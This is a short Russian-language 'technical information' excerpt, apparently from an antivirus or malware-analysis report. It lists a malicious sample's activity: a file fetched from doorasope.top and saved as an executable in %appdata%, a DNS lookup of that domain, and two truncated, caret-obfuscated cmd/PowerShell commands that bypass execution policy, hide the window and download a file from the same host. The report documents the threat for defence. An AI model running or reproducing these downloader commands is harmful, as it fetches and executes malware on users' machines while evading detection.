Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^wER^sHe^ll^.^ExE^ -ExeCU^ti^OnPolIC^Y B^y^pA^SS -NoprOFILe^ -w^in^D^O^WS^tY^L^E H^id^DEn^ ^(Ne^W^-o^BJ^ect^ S^YStEM.NE^T.W^E^bcliEnt).^d^O^w^NL^oAD^File(^'http://www.doorasope.top...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "P^o^wER^sHe^ll^.^ExE^ -ExeCU^ti^OnPolIC^Y B^y^pA^SS -NoprOFILe^ -w^in^D^O^WS^tY^L^E H^id^DEn^ ^(Ne^W^-o^BJ^ect^ S^YStEM.NE^T.W^E^bcliEnt).^d^O^w^NL^oAD^File(^'http://www.doorasope.top...' (со скрытым окном)